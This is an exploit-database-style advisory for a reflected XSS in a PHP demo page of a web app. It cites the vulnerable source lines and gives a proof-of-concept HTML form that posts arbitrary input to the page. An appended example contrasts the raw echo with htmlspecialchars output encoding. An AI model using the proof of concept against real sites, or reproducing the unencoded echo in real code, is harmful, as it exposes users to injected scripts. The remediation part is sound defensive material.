Coolred web XSS Vulnerability

2018.01.12
The_Ripper (DE)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Exploit title : Coolred web XSS Vulnerability
[-] Software dl : https://github.com/Coolred/WebApps
[-] Category : WebApps
[-] Author : The_Ripper
[-] Tested on : Win XP
[-] Date : 11-1-2018
[-] Dork : N/A
[-] Telegram : @The_Ripper
==================================
Description :
[-] XSS allows an attacker to run JavaScript code.
==================================
Vulnerable page :
http://localhost/coolred/SimplyBank/demo/runPerso.php
==================================
Vulnerable source :
line 10 >> $script_input = $_POST['script'];
line 104 >> echo $script_input;
==================================
PoC :
As you can see above, the $script_input variable has an XSS bug, and here's the exploit. Enjoy
Exploit :
<form action="http://localhost/coolred/SimplyBank/demo/runPerso.php" method="post">
<input type="text" name="script">
<input type="submit">
</form>
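
The unencoded echo from the vulnerable source above, beside an output-encoded version, as an added example that is not code from the advisory or from the Coolred project. The function names and the sample input are constructed for illustration, and it assumes the posted value is meant to be displayed as text.

```php
<?php
declare(strict_types=1);

// Pattern reported in the advisory (lines 10 and 104 of runPerso.php):
// the POST value reaches the response body with no output encoding.
// Hypothetical wrapper; the original code echoes directly.
function render_unescaped(array $post): string
{
    $script_input = $post['script'] ?? '';
    return (string) $script_input;
}

// Hardened form: encode for the HTML context at the point of output.
// Hypothetical wrapper, same input as above.
function render_escaped(array $post): string
{
    $script_input = $post['script'] ?? '';
    if (!is_string($script_input)) {
        // A request sent as script[]=x arrives as an array; treat it as empty.
        $script_input = '';
    }
    // ENT_QUOTES encodes both quote styles so the value is also safe inside
    // a quoted attribute; ENT_SUBSTITUTE replaces invalid UTF-8 sequences
    // instead of returning an empty string.
    return htmlspecialchars($script_input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input standing in for $_POST.
$post = ['script' => '<b>"demo" & \'test\'</b>'];

// The first line comes back as live markup, the second as inert text.
echo 'unescaped: ', render_unescaped($post), PHP_EOL;
echo 'escaped:   ', render_escaped($post), PHP_EOL;
```

The encoding belongs at the echo on line 104 rather than at the assignment on line 10, so the stored value stays unchanged for any non-HTML use.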

